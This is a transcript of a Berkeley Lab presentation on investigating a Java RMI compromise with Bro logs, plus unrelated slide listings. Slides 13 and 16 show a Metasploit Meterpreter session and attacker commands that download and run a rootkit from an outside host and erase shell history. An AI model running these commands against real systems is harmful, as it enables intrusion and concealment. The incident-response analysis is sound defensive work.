p0wnage and detection with bro
play

p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer - PowerPoint PPT Presentation

Aug 26, 2022 •206 likes •753 views

p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer Berkeley Lab 80 Years of World-Leading Team Science at Lawrence Berkeley National Laboratory Managed and operated by UC for the U.S. Department of Energy >200

  1. p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer Berkeley Lab

  2. 80 Years of World-Leading Team Science at Lawrence Berkeley National Laboratory • Managed and operated by UC for the U.S. Department of Energy • >200 University of California faculty on staff at LBNL • 4200 Employees, ~$820M/year Budget • 13 Nobel Prizes • 63 members of the National Academy of Sciences (~3% of the Academy) • 18 members of the National Academy of Engineering, 2 of the Institute of Medicine Office of 2 Science

  3. World-Class User Facilities Serving the Nation and the World Advanced Molecular Light Foundry Source Joint Genome Institute Energy Sciences Network National Energy Research FLEXlab Supercomputer Over 10,000 visiting scientists (~2/3 from universities) use Berkeley Lab research facilities each year Office of 3 Science

  4. LBL is the birthplace of Bro ● Bro logs on disk from 1990s ● Close collaboration with the Bro team ● We use Bro for everything! ○ Of course we have other tools also

  5. Releasing our 100G Intrusion Detection document http://go.lbl.gov/100g

  6. How do we do IR with Bro? ● No SEIM (except Gmail) ○ so we make bro act as SEIM ● Central log repo + multiple “crunching” machines ● GNU parallel and command line tools ○ (grep, awk, sed, sort, cut, cf, hf, etc.) ● Why? ○ It’s still the fastest we’ve found and the team has lots of old school tricks ● Bro is among the tools that detect incidents, but it _always_ helps solve them

  8. Fireeye alert alerts: msg: normal product: Web MPS version: 7.1.1.209016 appliance: fireeye.lbl.gov alert (id:1481036, name:malware-callback): severity: crit explanation: protocol: tcp analysis: content malware-detected: malware (name:Trojan.Meterpreter): stype: bot-command sid: 33336028 protocol: tcp port: 8080 address: 209.112.253.167 location: US/CO/Golden channel: POST /g6uP_DrmyU6s3EzbVypHJ/ HTTP/1.1::~~User-Agent: Java/1.4.2_03::~~Host: 209.112.253.167:8080::~~Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2::~~Connection: keep-alive::~~Content-Type: application/x-www-form-urlencoded::~~Content-Length: 126::~~::~~ src: vlan: 0 ip: 131.243.xxx.xxx host: xxxxx.lbl.gov port: 60668 mac: dst: ip: 209.112.253.167 mac: port: 8080 occurred: 2014-05-25T05:28:38Z mode: tap label: A1 interface (mode:tap, label:A1): pether3 alert-url: https://fireeye.lbl.gov/event_stream/events_for_bot?ev_id=1481036 action: notified

  9. Quick...to the conn logs! Correlation with the Fireeye IP: May 24 22:20:31 209.112.253.167 39158 131.243.xxx.xxx 1099 tcp - 4.721549 203 44 SF F 0 ShADadfF 7 575 6 364 May 24 22:20:32 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr 23 1623 27 31928 How did they find it? Scanner blocked soon after… May 23 22:12:46 50.21.187.18 47010 131.243.xxx.xxx 1099 tcp - 0.062209 0 0 RSTO F 0 ShR 2 80 44

  10. Java RMI ● Allows you to upload Java application components/bundles (among other things) ● Often used for app-specific functionality ● Several vulnerabilities with older versions ● Defaults to port 1099/tcp

  11. more conn.log First we see the RMI upload: May 24 22:16:56 107.161.158.254 42364 131.243.xxx.xxx 1099 tcp - 2.380179 198 2640 SF F 0 ShADadfF This looks like Metasploit: May 24 22:20:31 131.243.xxx.xxx 60482 209.112.253.167 8080 tcp http 5.372625 180 7154 SF T 0 ShADadFf May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr

  12. Then the http logs Confirming the GET of our exploit: May 24 22:20:31 CWXEiw4opxO6pQqMHb 131.243.xxx.xxx 60482 209.112.253.167 8080 1 GET 209.112.253.167 /OJpl3rP6kDDz/femw.jar - Java/1.4.2_03 0 7015 200 OK - - - (empty) - - - - - FNx3Px2NhlZziiztJk application/zip May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 1 GET 209.112.253.167 /INITJM - Java/1.4.2_03030470 200 OK - - - (empty) - - - - - FbzYLI3zFZam4tVf21 application/octet- stream Then the reverse shell/meterpreter session begins: May 24 22:20:36 CFz00C2y9yukeY98L1 131.243.xxx.xxx 60486 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 4 38916 200 OK - - - (empty) - - - FFiphrjsAzy2OYZY8 text/plain FZJKjl14HsEpevI4b6 application/octet-stream May 24 22:20:36 CBFoYM26kAlx03AE84 131.243.xxx.xxx 60487 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 888 0 200 OK - - - (empty) - - - FHfnM73a2CtqDw5yA9 application/octet-stream - -

  13. Confirmed with Metasploit msf exploit(java_rmi_server) > exploit [*] Started reverse handler on 131.243.xx.xxx:4444 [*] Using URL: http://0.0.0.0:4445/ [*] Local IP: http://131.243.xx.xxx:4445/ [*] Connected and sending request for http://131.243.xx.xxx:4445//KqgMtwKu.jar [*] 131.243.yyy.yyy java_rmi_server - Replied to request for payload JAR [*] Sending stage (30355 bytes) to 131.243.yyy.yyy [*] Meterpreter session 1 opened (131.243.xx.xxx:4444 -> 131.243.yyy.yyy:33597) at 2014-05-25 12:19:12 -0700 [+] Target 131.243.yyy.yyy:1099 may be exploitable... [*] Server stopped. meterpreter > getuid Server username: root meterpreter > sysinfo Computer : xxxxx.lbl.gov OS : Linux 2.4.20-28.8smp (i386) Meterpreter : java/java

  14. irc logs irc-limited May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 NICK LTVZH May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 USER BJQOIF localhost localhost :DRCE May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud- ips.com JOIN #dev# with channel key: ':fucku' May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud- ips.com JOIN #dev# irc-detailed May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) NOTICE Auth :Welcome to ^BRoxNet^B! May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 001 LTVZH :Welcome to the RoxNet IRC Network LTVZH!BJQOIF@XXXXX.lbl.gov May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 002 LTVZH :Your host is RoxNet.net, running version InspIRCd-2.0 May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 003 LTVZH :This server was created 03:45:33 May 11 2014 May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 004 LTVZH RoxNet.net InspIRCd-2.0 BHIRSWciorswx ACHIMNOPQRSTYabcghijklmnopqrstuvz HIYabghjkloqv

  15. IRC detail logs #dev# :uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh (q!z@oper.z0r.us) PRIVMSG #dev# :.ip 131.243.x.x (NSAGOV!eggdrop@rapesec2ee8uk.members.linode.com) PRIVMSG #dev# :Range: 131.243.0.0 - 131.243.255.255 :: NetName: LBL-IP-NET2 :: Organization: Lawrence Berkeley National Laboratory :: Country: US (syn!whothef@master.net) PRIVMSG #dev# :^A ACTION shoves clothes into bag ^A (q!z@oper.z0r.us) PRIVMSG #dev# :see you in mexico (syn!whothef@master.net) PRIVMSG #dev# :mexico is just where im telling you snitches im going (syn!whothef@master.net) PRIVMSG #dev# :YOU CAN BOTH FRY (syn!whothef@master.net) PRIVMSG #dev# :forte prob left (syn!whothef@master.net) PRIVMSG #dev# :fuck you (q!z@oper.z0r.us) PRIVMSG #dev# :ROFL (syn!whothef@master.net) PRIVMSG #dev# :LOL (syn!whothef@master.net) PRIVMSG #dev# :idk if we should keep it kaiten'd man (syn!whothef@master.net) PRIVMSG #dev# :lol (syn!whothef@master.net) PRIVMSG #dev# :i can try to rootkit it (syn!whothef@master.net) PRIVMSG #dev# :man thats scary as fuck

  16. Watching Metasploit with Time Machine wget http://rapesec.servehttp.com/conf.c gcc -o /tmp/... /tmp/conf.c;/tmp/... rm -rf conf.c; history -c CHAT CLIENT rm -rf ~/.bash_history;ln -s /dev/null ~/. bash_history CLEAR HISTORY cd /tmp; wget http://rapesec.servehttp. com/jsnow.tar.gz tar zxf jsnow.tar.gz;rm -rf jsnow.tar.gz;cd jsnow;./setup.sh ROOTKIT

  17. Feeding back into Bro: HTTP_SensitiveURI (example of extending a policy) wget http://rapesec.servehttp.com/jsnow.tar.gz redef sensitive_URIs += / jsnow\.tar\.gz / ; event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string) &priority=3 { local url = build_url_http(c$http); local message = fmt("%s %s", c$http$method, url); if ( sensitive_URIs in unescaped_URI ) { NOTICE([$note=HTTP_SensitiveURI, $msg=message, $method=c$http$method, $conn=c, $URL=url, $identifier=cat(c$id$orig_h,url),$suppress_for=180 min]); } }

  18. Gmail phishing attack (Need for a new policy)

  19. Subject: Important document Please see the attached file for your review. Thank you, Loan Broker Document8229tax.PDF <http://www.newfleld.com/>

  20. Subject: Important document Please see the attached file for your review. Thank you, User Lab-Docs.Pdf <http://www.newfleld.com/>

  21. Delivered to ~1700 people, 800 Lab and 900 external

Recommend

Detection of neutral particles detection of neutrons detection of neutrinons detection of low

Detection of neutral particles detection of neutrons detection of neutrinons detection of low

Detection of neutral particles detection of neutrons detection of neutrinons detection of low energy photons (detection of high energy photons calorimeters) Peter Krizan, Neutron and neutrino detection Detection of neutral particles

1.21k views • 67 slides
Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of

Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of

Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of Ammonia Ammonia A A i i Ne w Me thod Validate d F ollowing E PA Guidanc e AT AT P Case #: N08 0004 P Case #: N08-0004 E dwa rd F Aske w

551 views • 32 slides
Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known

Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known

07 Tutorial: Broadphase Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known weaknesses Fixed-timestep weakness All-pairs weakness Pair-processing weakness Two-phase collision detection

833 views • 20 slides
GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors

GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors

GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors perspectives in France Giovanni Calderini (LPNHE Paris) Journes Prospectives IN2P3/IRFU Giens 2012 1 Huge subject in terms of detection principles /

319 views • 30 slides
Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 |

Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 |

Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 | info@detection-technologies.com | www.detection-technologies.com Mikro Tek Key Advantages One analyzer - up to 300m detection range! A single Mikro Tek

874 views • 6 slides
Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes

Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes

Srinidhi Varadarajan 02/14/2000 Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes (e.g. CRC, Send a duplicate copy of the Parity, Checksums) message Error Correction Codes (e.g. Problems

269 views • 5 slides
www.thomas-leak-detection.com Leak Detection Class I Presentation EN 2014-02-19 Part1.docx ABOUT

www.thomas-leak-detection.com Leak Detection Class I Presentation EN 2014-02-19 Part1.docx ABOUT

Class I Leak Detection Systems - Highest level of monitoring and prevention of double walled tanks and pipes, according EU Standard EN 13160-2 Advantages Working Principle Product Overview www.thomas-leak-detection.com Leak

206 views • 16 slides
ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits

ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits

ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits (redundancy) D = Data protected by error checking, may include header fields Error detection not 100% reliable! protocol may miss some errors,

320 views • 18 slides
Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT

Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT

Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT 741/459 Data Mining -- Outlier Detection (1) 2 Techniques: Fraud Detection Features Dissimilarity Groups and noise

878 views • 30 slides
People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth

People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth

People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth Bernt Schiele Department of Computer Science TU Darmstadt People-Tracking-by-Detection and People-Detection-by-Tracking - CVPR 2008 Motivation

899 views • 89 slides
CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to

CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to

CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to implement some basic collision detection in the motion example I.e., to keep our square from moving out of the window Checking for

679 views • 14 slides
Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification

Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification

CS6501: Deep Learning for Visual Recognition Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification deer? cat? CNN background? Object Detection as Classification deer? cat? CNN background?

577 views • 28 slides
Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris

Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris

Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris Dick, Yang Sun, Joseph Cavallaro December 1, 2011 MIMO Detection Spatial Multiplexing H Increases throughput Used in many wireless

200 views • 16 slides
A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and

A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and

A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and segment salient objects in natural scenes a) good detection b) high resolution c) computational efficiency Metric F-score MAE (mean

1.12k views • 39 slides
Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection

Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection

Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection Prof Emmanuel Agu Computer Science Dept. Worcester Polytechnic Institute (WPI) Recall: Edge Detection Image processing task that finds edges and

773 views • 63 slides
Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction

Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction

Voice Activity Detection Introduction Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction Algorithms Victor Lenoir Threshold VAD Gaussian Mixture Model VAD LRDE Experiments Laboratoire de Recherche

367 views • 35 slides
Pipeline leak detection eLearning Part 1 of 2 Please turn on your speakers Historical

Pipeline leak detection eLearning Part 1 of 2 Please turn on your speakers Historical

Pipeline leak detection eLearning Part 1 of 2 Please turn on your speakers Historical development Leak detection system requirements Causes of leaks Leak detection options Non-continuous leak detection Continuous external leak detection

806 views • 49 slides
1 Research Goal Proposed tool: Chained clone detection tool Detection of clone sets connected

1 Research Goal Proposed tool: Chained clone detection tool Detection of clone sets connected

Overview of my presentation Introduction of chained clone detection Detection of Chained Clone and Its Application N.Yoshida, et al.: &quot;On Refactoring Support Based on Code Clone Dependency Relation&quot;, Proc. of METRICS 2005.

316 views • 4 slides
Face detection, local features face alignment, and Face detection

Face detection, local features face alignment, and Face detection

12/6/2013 Lecture overview Brief introduction to Face detection, local features face alignment, and Face detection http://www.ima.umn.edu/2008-2009/MM8.5-14.09/activities/Wohlberg-Brendt/sift.png face image parsing

238 views • 11 slides
Online advertisement blocker detection: A look at the state of the art for counter-detection and

Online advertisement blocker detection: A look at the state of the art for counter-detection and

Context State of the art Motivation and objectives Proposal Implementation Results and conclusions Demonstration Online advertisement blocker detection: A look at the state of the art for counter-detection and a proof-of-concept for new

472 views • 26 slides
Collision Detection I Motivation F d X S, X Collision Force detection response F d F r

Collision Detection I Motivation F d X S, X Collision Force detection response F d F r

CPSC 599.86 / 601.86 Sonny Chan - University of Calgary Collision Detection I Motivation F d X S, X Collision Force detection response F d F r Control algorithms Haptic rendering Problem Definition We seek efficient algorithms to

822 views • 42 slides
Styles of Intrusion Detection Misuse intrusion detection Try to detect things known to be

Styles of Intrusion Detection Misuse intrusion detection Try to detect things known to be

Styles of Intrusion Detection Misuse intrusion detection Try to detect things known to be bad Anomaly intrusion detection Try to detect deviations from normal behavior Specification intrusion detection Try to detect

627 views • 15 slides
Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier

Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier

Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier Detection Automatically identify data points that are somehow different from the rest Working assumption: There are considerably

905 views • 74 slides
Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier

Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier

Data Mining II Anomaly Detection Heiko Paulheim Anomaly Detection Also known as Outlier Detection Automatically identify data points that are somehow different from the rest Working assumption: There are considerably

984 views • 72 slides

More recommend